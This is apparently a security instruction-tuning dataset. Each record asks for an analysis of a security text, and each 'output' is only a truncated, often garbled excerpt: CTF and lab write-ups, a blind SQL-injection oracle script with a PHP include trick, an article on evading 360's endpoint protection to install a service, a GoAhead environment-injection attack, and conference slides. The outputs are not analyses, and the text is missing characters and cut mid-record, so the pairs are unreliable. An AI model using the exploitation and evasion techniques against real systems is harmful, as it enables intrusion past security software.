0x00000a6c int mode | | 0x00000a71 char *buf | | 0x00000a76 FILE*stream | | 0x00000a79 call sym.imp.setvbuf | | 0x00000000 [28] ---- section size 254 named .shstrtab | | 0x00000a7e const char *s | | 0x00000a7e str.Please_Enter_a_product_key_to_continue: | | 0x00000a85 call sym", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# HackLABvulnix > 下载地址https://download.vulnhub.com/hacklab/Vulnix.7z ## 实战操作 ### 信息收集 ``` (rootkali)-[~] # fping -a -g 192.168.32.0/24 > /tmp/scan.log (rootkali)-[~] # cat /tmp/scan.log 1  192.168.32.1 192.168.32.2 192.168.32.130 192.168.32.143 ``` 找到靶机IP`192.168.32.143` 对IP进行端口扫描 ``` (rootkali)-[~] # nmap -sT -sC -sV -A -O -p1-65535 192.168.32.143 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-29 21:58 EDT Nmap scan report for 192.168.32.143 Host is up (0.00085s latency). Not shown: 65518 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA) | 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA) |_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN |_ssl-date: 2022-05-30T01:58:33+00:00; +2s from scanner time. 79/tcp open finger Linux fingerd |_finger: No one logged on.\\x0D 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: SASL PIPELINING TOP RESP-CODES STLS UIDL CAPA |_ssl-date: 2022-05-30T01:58:33+00:00; +2s from scanner time. 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100003 2,3,4 2049/udp nfs | 100003 2,3,4 2049/udp6 nfs | 100005 1,2,3 34690/tcp mountd | 100005 1,2,3 40182/tcp6 mountd | 100005 1,2,3 46697/udp mountd | 100005 1,2,3 48580/udp6 mountd | 100021 1,3,4 35088/tcp6 nlockmgr | 100021 1,3,4 37627/tcp nlockmgr | 100021 1,3,4 47312/udp nlockmgr | 100021 1,3,4 56054/udp6 nlockmgr | 100024 1 32992/udp status | 100024 1 45632/tcp status | 100024 1 55313/udp6 status | 100024 1 59036/tcp6 status | 100227 2,3 2049/tcp nfs_acl | 10", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n从服务创建拦截看端上主防软件的工作原理和 绕过方法 前言 书接上文在上一篇中我们详细讲解了服务的工作原理和隐藏方法但是如果我们的服务根本就无法直 接注册到系统中那上一节的内容就是白扯所以怎么能够绕过端上类似于360主动防御类型的软件 将我们的服务注册进系统是一个棘手的问题我们本节就着重研究这个问题看怎么绕过 从端上主防软件的工作原理讲起 本文把在客户端上利用行为进行拦截的软件成为端上主防软件简称为hips360的主动防御模块就是 典型的端上主防软件这类软件复杂的会有用户态监控和内态监控例如crowdstrike的Falcon简单的 只有内核态监控例如火绒hips360的主动防御 1. 用户态监控一般是inline hook在第三方程序启动的时候注入自己的DLL到目标进程中修改目 标程序中关键函数的前几个字节为jmp指令跳转到自己的处理函数记录函数调用的相关的参 数进行分析后再决定是否要返回到原函数完成工作任务 2. 内核态监控windows的64系统内核有patchguard机制之后不允许驱动程序对内核的关键数据 和代码进行patch了所以无法实现内核态的inline hook此时做行为监控只能用windows提供 的几个回调来实现主要的监控点如下 PsSetCreateProcessNotifyRoutineEx  此API允许你注册一个回调函数当系统中有新的进 程创建或线程创建就会将相关的数据传给你的回调函数你可以再自己的回调函数记录这个 行为以及是否允许这个操作 CmRegisterCallback此API注册的回调函数会在注册表发生改动的时候被调用再回调函数 中可以记录相关的信息并决定是否允许这个动作发生 ObRegisterCallbacks此API可以为系统关键的object操作注册回调比如打开进程创建线 程等 PsSetLoadImageNotifyRoutine 此API可以为系统的模块加载提供回调模块包括DLL和 sys虽然也可以在这个函数中通过patch被加载模块的代码实现拒绝模块的加载但是但 是这个行为有死锁风险在商业软件中并不敢这么用另外驱动的加载和模块加载有更好的监 控位置本文不再展开吴国感兴趣以后可以专门写文章介绍 Minifilter: windows提供的内核态文件监控和框架,能够拒绝文件操作 WFP  windows提供的包过滤框架可以实现网路监控能够拒绝网络操作 有了如上的这些内核态的监控点恶意程序对系统资源的敏感操作就无处遁形在发生恶意操作时就会 被行为防护模块kill掉 使用360测试服务创建的拦截 首先要明确端上安全软件的工作逻辑在运行一个可执行文件时安全软件的杀毒引擎会先工作使用 病毒库对文件进行扫描如果发现是白程序(已知的非恶意程序)就立马放行如果发现时黑程序(恶 意)就直接禁止执行如果发现是灰程序(无法判别)那么就会将可执行程序的信息发送给主防模块 主防对此程序后续的行为进行监控如果发现恶意就立马终止执行 我们接下里的测试和讨论都是建立在你的软件是静态免杀的前提下进行的 首先说明我并没有对360的驱动和规则引擎进行逆向分析我下面的结论全部来自我对行为防护软件 上的工作相关经验和个人猜测可能和真实的拦截规则有偏差如果有不正确我们再详细交流 独立进程的服务 上一节讲了三种注册服务的方法我们依次进行测试看360是怎么拦截的根据拦截的效果我们来分 析360拦截的原因然后想办法来绕过拦截 使用sc安装服务 使用命令安装服务是最简单的方式当然也是行为防护软件最容易拦截的方式 因为内核中的 PsSetCreateProcessNotifyRoutineEx 回调监控可以直接拿到sc.exe 执行时的命令行 所以拦截这个操作也仅仅只需要一个正则表达式就可以了 直接写注册表项 保存为1.reg,然后运行 regedit /s 1.reg : 执行完之后360并没有什么反应 sc create FirstService BinPath=\"C:\\ConsoleApplication1\\Release\\ConsoleApplication1.exe\" DisplayName=\"FirstService\" Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SecondService] \"DisplayNmae\"=\"SecondService\" \"ErrorControl\"=dword:01 \"ImagePath\"=hex(2):43,00,3a,00,5c,00,55,00,73,00,65,00,72,00,73,00,5c,00,41,00,\\ 64,00,6d,00,6", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# JaWT Scratchpad Web Exploitation, 400 points ## Description: > Check the admin scratchpad! ## Solution: Let's connect to the provided website: ```console root@kali:/media/sf_CTFs/pico/JaWT_Scratchpad# curl https://2019shell1.picoctf.com/problem/37903/ <!doctype html> <html> <title> JaWT - an online scratchpad </title> <link rel=\"stylesheet\" href=\"/static/css/stylesheet.css\"> <body> <header><h1>JaWT</h1> <br> <i><small>powered by <a href=\"https://jwt.io/\">JWT</a></small></i></header> <div id=\"main\"> <article> <h1>Welcome to JaWT!</h1> <p> JaWT is an online scratchpad, where you can \"jot\" down whatever you'd like! Consider it a notebook for your thoughts. <b style=\"color:blue \"> JaWT works best in Google Chrome for some reason. </b> </p> <p> You will need to log in to access the JaWT scratchpad. You can use any name, other than <code>admin</code>... because the <code>admin</code> user gets a special scratchpad! </p> <br> <form action=\"#\" method=\"POST\"> <input type=\"text\" name=\"user\" id=\"name\"> </form> <br> <h2> Register with your name! </h2> <p> You can use your name as a log in, because that's quick and easy to remember! If you don't like your name, use a short and cool one like <a href=\"https://github.com/magnumripper/JohnTheRipper\">John</a>! </p> </article> <nav></nav> <aside></aside> </div> <script> window.onload = function() { document.getElementById(\"name\").focus(); }; </script> </body> </html> ``` If we try to login as `admin`, we get an error: ```console root@kali:/media/sf_CTFs/pico/JaWT_Scratchpad# curl \"https://2019shell1.picoctf.com/problem/37903/\" -H \"Content-Type: application/x-www-form-urlencoded\" --data \"user=admin\" ... <p style=\"color:red\"> YOU CANNOT LOGIN AS THE ADMIN! HE IS SPECIAL AND YOU ARE NOT. </p> ... ``` However, logging in as another user is allowed: ```console root@kali:/media/sf_CTFs/pico/JaWT_Scratchpad# curl \"https://2019shell1.picoctf.com/problem/37903/\" -H \"Content-Type: application/x-www-form-urlencoded\" --data \"user=john\" -v * Try", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n11 Machine Learning 22 Machine Learning as a Tool 33 Machine Learning as a Tool for Societal Exploitation 44 A Summary on the Current and Future State of Affairs 55 A Bit About Me (Im going to pretend you care) 66 F1F1cin  Student at Columbia University in New York  Independent Researcher  Mostly focus on malware  Probably younger than you think  I want to hack a human one day (judge all you want) 77 Current State The Common and the Uncommon 88 Standard Uses (generally beneficial, sometimes concerning) 99 The Human Side  Financial Trading  Sports Injuries  [courtesy of Quantum Black] 1010 The Technical Side  Data Security  Antivirus Software  Endpoint Detection Systems 1111 The Technical Side  Data Security  Antivirus Software  Endpoint Detection Systems Normal people dont think about this (?) 1212 Uncommon Uses (usually concerning, generally cool) R EALLY 1313 Crazy Dystopian S**t Ambient Sound Mapping  Determine precise location and orientation through microphone-embedded devices [without consent] Individual Profling  Recreating the human based on digital fngerprints 1414 Ambient Sound Mapping 1515 Crazy Dystopian S**t Ambient Sound Mapping  Determine precise location and orientation through microphone-embedded devices [without consent] Individual Profling  Recreating the human based on digital fngerprints  Actually more common than I give it credit for 1616 Individual Profiling 1717 The Future of Attack 1818 FIRST THING TO REMEMBER 1919 AI is NOT Attackproof (Im sure you know this) 2020 AI is NOT Attackproof  Attack isnt limited to using AI as a weapon 2121 AI is NOT Attackproof  Attack isnt limited to using AI as a weapon  Attack can mean attacks targetted towards AI systems 2222 AI as a Weapon 2323 Current Experiments / Research / whatever you want to call it 2424 Whatever you want to call it  Wargames  [courtesy of Endgame]  Intelligent Malware  Adapting to a changing environment 2525 Attacks on AI Systems 2626 This is not what I Typically Do  BUT 2727 This is", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nxauth === 显示和编辑被用于连接X服务器的认证信息 ## 补充说明 **xauth命令** 用于显示和编辑被用于连接X服务器的认证信息 ### 语法 ```shell xauth(选项)(参数) ``` ### 选项 ```shell -f不使用默认的认证文件而使用指定的认证文件 -q安静模式不打印未请求的状态信息 -v详细模式打印指定的各种操作信息 -i忽略认证文件锁定 -b执行任何操作终端认证文件锁定 ``` ### 参数 * add添加认证条目到认证文件中 * extract将指定的设备内容加入到指定的密码文件中 * info显示授权文件相关信息 * exit退出交互模式 * list列出给定的显示设备的内容 * merge合并多个授权文件内容 * extract将指定设备内容写入指定的授权文件 * nextrct将指定设备内容写入指定的授权文件 * nmerge合并多个授权文件内容 * remove删除指定显示设备的授权条目 * source从指定文件读取包含xauth的内容指令", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCo v ert Messaging Through TCP Timestamps John Gin  Rac hel Greenstadt  P eter Lit w ac k  Ric hard Tibb etts  fgifgreeniep li twa ck ti bb et tsg m it ed u Massac h usetts Institute of T ec hnology Abstract W e presen t a proto col for sending data o v er a common class of lo wbandwidth co v ert c hannels Co v ert c hannels exist in most com m unications systems and allo w individuals to comm unicate truly unde tectably Ho w ev er co v ert c hannels are seldom used due to their complex it y Our proto col is b oth practical and secure against attac k b y p o w erful adv ersaries W e implemen t our proto col on a standard platform Lin ux exploiting a c hannel in a common comm unications system TCP times tamps  In tro duction A co v ert c hannel is a comm unications c hannel whic h allo ws information to b e transferred in a w a y that violates a securit y p olicy As a result co v ert c hannels are imp ortan t metho ds of censorship resistance An eectiv e co v ert c hannel is undetectable b y the adv ersary and can pro vide a strong degree of priv acy Often the fact that secret comm unication is taking place b et w een parties is extremely rev ealing Consider the prisoners problem rst form ulated b y Simmons Alice and Bob are in prison attempting to plan an escap e They are allo w ed to comm uni cate but a W arden w atc hes all of their comm unications If the W arden notices that they are planning to escap e or ev en susp ects them of trying to comm unicate secretly they will b e placed in solitary connemen t The prisoners problem is theoretically in teresting and pro vides a go o d ex planation of the problem that co v ert c hannels solv e this problem is increasingly relev an t in real w orld situations Man y go v ernmen ts pro vide restrictions on the use of cryptograph y on their systems The situation is particularly extreme in China where all ISPs are sub ject to go v ernmen t con trol although electronic systems are increasingly sub ject to surv eillance in all ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# V1rus3pidem1c (web 100) ## ENG [PL](#pl-version) In the task we get a webpage where we can select a country from dropdown and for some countries this shows us file upload form and for some of them it doesn't. For example there is a form for `Germany` and no form for `Russia`. The country name is passed as GET parameter in the query, and we decide to see what exactly is done with it. A little bit of fuzzing tells us that it goes into some SQL query into where condition. With classic `country=Russia' or '1'='1` we get a form for Germany, which means we managed to exploit the task with SQL Injection. We tried a bit to get some echo here, but couldn't, so we simply switched to run Blind SQLi attack. We got a simple oracle function: ``` import requests session = requests.session() def is_true(condition): url = \"http://tasks.ctf.com.ua:13372/index.php?country=Russia' or (%s) -- a\" % condition result = session.get(url) return 'virus for Germany' in result.text def main(): print(is_true(\"1=1\")) print(is_true(\"1=0\")) main() ``` And with this we can extract `Information_Schema.Tables` and `Information_Schema.Columns` data, with simple substring and byte-by-byte comparison using the oracle function. This tells us there we have only a single user defined table and it contains only `countryID, countryName, scriptPath`. Last parameter is especially interesting since it's an actual path to php script with form, which gets included on the page. It's in form: `country/ge.php`, `country/tu.php` etc. We could use our SQLi to include some other file by `index.php?country=' union select 'somefile.php' -- comment`, but we can't put any file on the server. But since we control the include path we decided to check good old php wrappers and force the server to include: `php://filter/read=convert.base64-encode/resource=country/ge.php` and as expected we get a nice base64 contents of the php script. It seems that the files uploaded by the form available for some countries actually get uploa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFeei <feei@feei.cn> Github敏敏感信息泄露露监控 止介 <feei@feei.cn> Feei <feei@feei.cn> 吴止介Feei 介绍  白帽子  美丽联合集团 安全项目总监  专注漏漏洞洞自动化发现与防御 Feei <feei@feei.cn> 议程  背景  爬取方案  特征思路路  规则设计  报告  误报  未来 Feei <feei@feei.cn> 背景 以技术手段杜绝由于员工意识问题导致的Github敏敏感信息泄露露 Feei <feei@feei.cn> 爬取方案 爬取 Proxy+Page vs Token+API Feei <feei@feei.cn> 准实时与频率限制的取舍 爬取 CORP * RULES(N1) * (SEARCH + PAGES(N2) + (PAGE_LIST + HTML_URL + SHA + PATH + FULL_NAME + CONTENT) * PER_PAGE(N3)) N1= ?, N2 = 20, N3 = 50 Token Max Requests(5000) / Single Rule Requests(320) = Rules(15) Feei <feei@feei.cn> 内部特征 - 域名反查 通用内网域名特征 .net alipay.net taobao.net qihoo.net elenet.me 后缀 mogujie.org tuniu.org dianrong.io bilibili.co inc meili-inc.com sohu-inc.com alibaba-inc.com cainiao-inc.com corp ctripcorp.com 相似 wemomo.com Feei <feei@feei.cn> 内部特征 - Github模糊查询 通用模糊搜索词 domain.tld corp domain.tld dev domain.tld inc domain.tld pre domain.tld test domain inc domain copyright Feei <feei@feei.cn> 内部特征 Meili-Inc 内部域名 mogujie.org / meili-inc.com 对外邮箱 mail.mogujie.com Feei <feei@feei.cn> 内部特征 iQIYI 代码注释 IQIYI Inc 内部域名 qiyi.domain 主机 qiyi.virtual 数据库 qiyi.db 对外邮箱 mail.iqiyi.com Feei <feei@feei.cn> 内部特征 Baidu 代码注释 @baidu.com Baidu, Inc 内部域名 vm.baidu.com / epc.baidu.com iwm.name 主机 vm.baidu.com / nj01.baidu.com sh01.dba-nuomi-bgoods.sh01 数据库 xdb.all.serv db-dba-dbbk-001.db01 对外邮箱 smtp.baidu.com Feei <feei@feei.cn> 内部特征 Other 京东 jd.local 360 qihoo.net 搜狐 sohuno.com 苏宁 cnsuning.com 陌陌 wemomo.com 饿了了么 elenet.me 携程 ctripcorp.com 去哪儿 qunar.net 支付宝 alipay.net 淘宝 taobao.net 小米 mioffice.cn 菜鸟 cainiao-inc Feei <feei@feei.cn> 通特征 企业邮箱 exmail.qq.com qiye.163.com 263.net mxhichina.com icoremail.net  私密文档 账号 密码 微信密钥 appid appsecret QCloud密钥 privatekey publickey Feei <feei@feei.cn> 搜索特性 强制搜索 加引号比如meili-inc.com 横杠默认不不匹配 使用meili-inc.com搜索不不出使用meili inc.com则可以 分词特性 appsecret Feei <feei@feei.cn> 规则设计 Keywords 多个关键词可以用空格比如账号 密码 某些关键字出现的结果非常多所以需要精确搜索时可以用双引号括 起来比如ele.me Mode normal-match(default): 匹配包含keyword的行行并记录该行行附近行行 only-match:仅匹配包含keyword行行 full-match: 搜出来的整个问题都算作结果", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 pingOrce出题writeup ---种环境变量注劫 持bash的实际利场景 前 GoAhead GoAhead + bash 参考 前不久p分享了个利环境变量注劫持bash的技巧. 当时我就在想这种环境变量的注有没有什么较通的场景般遇到的环境变量注基本上都是直 接使ld_preload解决问题p的这种新的环境变量注的利技巧有没有什么特殊的利呢 嵌式设备常的Web服务器 GoAhead 出现过环境变量注漏洞 CVE-2017-17562 和 CVE-2021- 42342 漏洞的原理很简单服务器会把收到的CGI请求参数直接写到环境变量中 CVE-2017-17562 的修复案也很简单在写的环境变量前加 CGI_前缀 添加名单过滤实际上 效 但是这补丁并没有完全修复 在 multipart 表单请求遗漏了请求参数的处理 名单也没起作 所以就有了CVE-2021-42342 当时我在复现 CVE-2017-17562和CVE-2021-42342 时遇到了个问题. 我在上传件时发了500错误 控制台任何错误输出 阅读源码后我发现 GoAhead 上传件时会向个固定的临时件夹写临时件 默认为--home参数提供的录下的tmp 录 前 GoAhead 2 如果录不存在 或者是法写件就法完成上传流程在后来搜索漏洞分析的才发现了p的 章已经写过了我遇到的坑 还有些其他的学问题 在创建tmp录后我成功的完成了漏洞复现 这时我想到了个问题 嵌式设备多都是只读件系统即使是可写也没有创建这个临时录 那么这个漏洞在实际的场景下应该很难利 当时没有其他法只能步于此 直到我遇到了p的这篇章 些嵌式设备会有执系统命令的场景 如ping 路由跟踪 等等 在这个场景下并结合p的bash劫持就可以完美的完成命令执标 随便构建个cgi GoAhead + bash 3 web功能代码 C 复制代码 int isValidIp4 (char *str) { int segs = 0; /* Segment count. */ int chcnt = 0; /* Character count within segment. */ int accum = 0; /* Accumulator for segment. */ /* Catch NULL pointer. */ if (str == NULL) return 0; /* Process every character in string. */ while (*str != '\\0') { /* Segment changeover. */ if (*str == '.') { /* Must have some digits in segment. */ if (chcnt == 0) return 0; /* Limit number of segments. */ if (++segs == 4) return 0; /* Reset segment values and restart loop. */ chcnt = accum = 0; str++; continue; } /* Check numeric. */ if ((*str < '0') || (*str > '9')) return 0; /* Accumulate and check segment. */ if ((accum = accum * 10 + *str - '0') > 255) return 0; /* Advance other segment specific stuff and continue loop. */ chcnt++; 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 4 使p的 bash环境变量注劫持ping 命令实现任意代码执 str++; } /* Check enough segments and enough characters in last segment. */ if (segs != 3) return 0; if (chcnt == 0) return 0; /* Address okay. */ return 1; } printf(\"<HTML><TITLE>Network looking glass</TITLE><BODY>\\r\\n\"); printf(\"<form action=\\\"\\\" method=\\\"GET\\\">\\r\\n\"); printf(\"<in", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSteinthor)Bjarnason Jason)Jones Arbor)Networks The$call$is$coming$from$inside$the$house!$ Are$you$ready$for$the$next$evolution$in$ DDoS$attacks?$  The)Promise)of)IoT  More)personalized,)automated)services  Better)understanding)of)customer)needs  Optimized)availability)and)use)of) resources)  Resulting)in:  Lower)Costs  Improved)Health  Service)/)efficiency)gains  Lower)environmental)impact The$Wonders$of$IoT  To)fulfill)these)premises,) IoT)devices)are)usually:  Easy)to)Deploy  Easy)to)Use  Require)Minimal) Configuration)  Low)cost  However The$IoT$Problem$ Security$ Unprecedented DDoS attack sizes Mirai infections)December)2017  1M)login)attempts)from)11/29)to)12/12)from)92K)unique) IP)addresses  More$than$1$attempt$per$minute$in$some$regions The$Results The$Situation$Today  An)unprotected)IoT)device)on) the)Internet)will)get)infected) within)1)minute.  An)IoT)device)located)behind)a) NAT)device)or)a)Firewall)is)not) accessible)from)the)Internet)and) is)therefore)(mostly))secure.)  But)in)January)2017,)this)all) changed http://marketingland.com/wp-content/ml-loads/2014/09/iceberg-ss-1920.jpg Windows-Based$IoT$Infection  Desktop)malware)spreading)multi-platform)malware)is)not)new  Increasingly)common)technique)amongst)both)targeted)malware)and)crimeware,) primarily)focusing)on)mobile)devices  HackingTeam RCS  WireLurker  DualToy  BackStab)campaign  Banking)trojans will)also)targeting)mobile)devices)to)steal)2FA)/)SMS)authorization) codes  May)consist)of)a)sideload installation)or)tricking)a)user)to)click)a)link)on)their)phone  IOT)devices)present)a)new)and)ripe)infection)vector  Windows)Mirai)is)the)first)known)multi-platform)trojan to)target)IoT)devices)for)infection Background  HackingTeam RCS)is)a)well-known)implant)commonly)sold)to)nation-state) organizations)for)monitoring)/)spying)purposes  HackingTeam has)clients)for)both)Mac)and)Windows)Desktop)systems  Also)clients)for)Android,)iOS,)Blackberry,)WindowsPhone mobile)OS  Infection)on)mobile)operating)systems)c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: braa categories: Information Gathering tags: [kali linux,enumeration,braa,information gathering,snmp] date: 2016-10-19 06:38:49 --- 0x00 braa介绍 ------------- Braa是大规模SNMP扫描工具,这种工具的预期用途当然是使SNMPSimple Network Management Protocol简单网络管理查询 - 但不同于来自net-snmp的snmpget或snmpwalk它能够在单个进程中同时查询几十或几百个主机 因此它消耗非常少的系统资源并且扫描非常快 Braa通过它的OWN snmp栈实现所以它不需要任何SNMP库如net-snmp 它的实现非常脏只支持几种数据类型并且在任何情况下都不能说符合标准 但是它跑起来飞快 因为这个原因好吧也是因为我的懒惰在braa中没有ASN.1解析器 - 你必须知道OID的数值例如.1.3.6.1.2.1.1.5.0 而不是用system.sysName.0 OID可以理解为有规则的设备参数编码snmp协议将设备的各种参数按树形结构进行分组从树的根部开始每一个层级节点会有一个编码将这些层级编码以.\"作为分隔符将其拼接起来所形成的一串编码就叫OID通过OID可以对该OID表示的参数进行操作 可以参考[SNMP监控一些常用OID的总结][1] 工具来源braa README [braa主页][2] | [Kali braaRepo仓库][3] - 作者Mateusz mteg Golicz - 证书GPLv2 0x01 braa功能 --------------- Braa - 大规模SNMP扫描工具 ```shell root@kali:~# braa braa 0.81 - Mateusz'mteg'Golicz <mtg@elsat.net.pl>2003 - 2006 用法braa [options] [query1] [query2] ... -h 显示此帮助 -2 声明SNMP2C代理 -v 执行所有查询后显示简要摘要 -x 十六进制转储八位字节串 -t <s> 获得响应前等待数秒 -d <s> 发送每个数据包后等待微秒数 -p <s> 在后续遍之间等待数毫秒 -f <file> 从文件<file>加载查询逐行 -a <time> 在<time>秒后退出 -r <rc> 重试次数默认值3 查询格式 GET: [community@]iprange[:port]:oid[/id] WALK: [community@]iprange[:port]:oid.*[/id] SET: [community@]iprange[:port]:oid=value[/id] 例子 public@10.253.101.1:161:.1.3.6.* 10.253.101.1-10.253.101.255:.1.3.6.1.2.1.1.4.0=sme 10.253.101.1:.1.3.6.1.2.1.1.1.0/description 也可以一次指定多个查询 10.253.101.1-10.253.101.255:.1.3.6.1.2.1.1.4.0=sme,.1.3.6.* 将.1.3.6.1.2.1.1.4.0设置为'me'并从.1.3.6开始 SET查询的值必须在前面加上指定值类型的字符 i 是INTEGER类型 a 是IPADDRESS类型 s 是OCTET STRING类型 o 是OBJECT IDENTIFIER类型 如果缺少类型说明符则会自动检测值类型 ``` 0x02 braa用法示例 ----------------- 使用公开公布的OID字符串在192.168.1.215上运行遍历SNMP树查询.1.3.6下的所有OID ```shell root@kali:~# braa public@192.168.1.215:.1.3.6.* 192.168.1.215:122ms:.1.3.6.1.2.1.1.1.0:Linux redhat.biz.local 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 192.168.1.215:143ms:.1.3.6.1.2.1.1.2.0:.1.3.6.1.4.1.8072.3.2.10 192.168.1.215:122ms:.1.3.6.1.2.1.1.3.0:4051218219 192.168.1.215:122ms:.1.3.6.1.2.1.1.4.0:Root <root@localhost> (configur", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsecurity when nanoseconds count James Arlen, CISA DEF CON 19 disclaimer I am employed in the Infosec industry, but not authorized to speak on behalf of my employer or clients. Everything I say can be blamed on the voices in your head. 2 credentials  15+ years information security specialist  staff operations, consultant, auditor, researcher  utilities vertical (grid operations, generation, distribution)  financial vertical (banks, trust companies, trading)  some hacker related stuff (founder of think|haus) ...still not an expert at anything. 3 nanoseconds... 4 5 Admiral Hopper says... From an interview segment by Morley Safer in 1982 $=c (speed of light matters)  distance light travels in a:  millisecond ~300km (~186 miles)  microsecond ~300m (~328 yards)  nanosecond ~30cm (~1 foot) 6 before you ask...  This is a talk about... $$  Im not going to mention any of those things on your buzz-word bingo card:  SCADA  APT  PCI - DSS  wikileaks  (anti-|lulz)sec  hacktivism  ...insert more here. 7 finance at DEF CON?  You know it!  DEF CON is all about offensive and defensive techniques and technologies  Sometimes, knowing that a vulnerability exists to be exploited helps to focus attention.  Sometimes, people like me tell you things that sound completely crazy but have a history of coming true. 8 trading history  1200s - Commodity and Debt trading  1500s - Inter-market trading  1600s - Equity trading  early 1800s - Reuters uses carrier pigeons  late 1800s - electronic ticker tape (market data feeds) become widespread  mid 1900s - quotation systems (next price rather than last price) become widespread  late 1900s - computers are used to maintain the records of the exchange  early 2000s - computers begin trading with each other without human intervention 9 definitions  high speed trading: committing trades on a scale faster than human interactive speeds  algorithmic trading: trades based on the mathematical result of incoming information from external sources (news, market data,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEF CON 19: This is REALLY not the Droid youre looking for Nicholas J. Percoco  Trustwaves SpiderLabs Sean Schulte  Trustwaves SSL Team Copyright Trustwave 2011 Agenda  Introductions  Primer / History: Android Platform Development  Mobile User Interface DOs and DONTs  Research Motivations  Research Implications  Demo  How it Works: Technical Deep Dive  Conclusions Copyright Trustwave 2011 Introductions Who are we? Nicholas J. Percoco (c7five)  Head of SpiderLabs at Trustwave  Started my InfoSec career in the 90s Sean Schulte (sirsean)  SSL Team at Trustwave  Backend Developer (Java & Ruby) Copyright Trustwave 2011 Introductions Whats this talk about? Part II of last years talk  Focused on Kernel Level Rootkit for Android OS  Raised awareness on the risks and implications  Did NOT touch on anything in userland Copyright Trustwave 2011 Introductions Whats this talk about? This year  We focused 100% on the userland  What tricks we could play using available APIs?  Explored what Google allowed developers to do  Discovered a Layer-7 0day in the process Copyright Trustwave 2011 Primer / History: Android Platform Dev What is the Android OS?  Android is a software stack for mobile devices that includes an operating system, middleware and key applications.  The applications consists of Java apps running on the Dalvik VM.  The middleware is made of C libraries including SQLite, OpenGL, WebKit, etc.  The kernel is Linux. Source: Google Copyright Trustwave 2011 Primer / History: Android Platform Dev How has Android evolved? - Donut / Éclair (XX%) - Revamped UI (introduced slide-from-right animation between different applications) - Froyo (XX%) - Performance improvements, Wifi tethering, Flash - Gingerbread (XX%) - Refined UI  No carrier cooperation, little uptake - Honeycomb (XX%) - Closed source, tablet-only Copyright Trustwave 2011 Primer / History: Android Platform Dev How does Google release Android updates?  Closed development inside Google  Source drop at the time of bina", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Contacts Binary Exploitation, 850 points ## Description: > This program for storing your contacts is currently in beta. Can you hijack control and get a shell? ```c #include <stdio.h> #include <string.h> #include <stdlib.h> #define MAX_CONTACTS 16 struct contact { char *name; char *bio; }; struct contact *contacts[MAX_CONTACTS]; unsigned int num_contacts = 0; void print_contacts(){ for (int i = 0; i < num_contacts; i++){ if (contacts[i]->bio != NULL){ printf(\"%s - %s\\n\", contacts[i]->name, contacts[i]->bio); }else{ printf(\"%s - (No bio)\\n\", contacts[i]->name); } } } struct contact *find_contact(char *name){ for (int i = 0; i < num_contacts; i++){ if (!strcmp(name, contacts[i]->name)){ return contacts[i]; } } return NULL; } void create_contact(char *name){ if (num_contacts == MAX_CONTACTS){ puts(\"Too many contacts! Delete one first!\"); return; } struct contact *contact = (struct contact *)malloc(sizeof(struct contact)); if (contact == NULL){ puts(\"Could not allocate new contact.\"); exit(-1); }; /* make a copy of the name on the heap */ contact->name = strdup(name); if (contact->name == NULL){ puts(\"Could not duplicate name.\"); exit(-1); } contacts[num_contacts++] = contact; } void delete_contact(struct contact *contact){ free(contact->name); /* if the bio is set, free it as well */ if (contact->bio != NULL){ free(contact->bio); } free(contact); /* replace the corresponding index with the last contact and decrement num_contacts */ for (int i = 0; i < num_contacts; i++){ if (contacts[i] == contact){ contacts[i] = contacts[num_contacts - 1]; num_contacts--; break; } } } void set_bio(struct contact *contact){ char input[4]; size_t length; /* we'll replace the old bio */ if 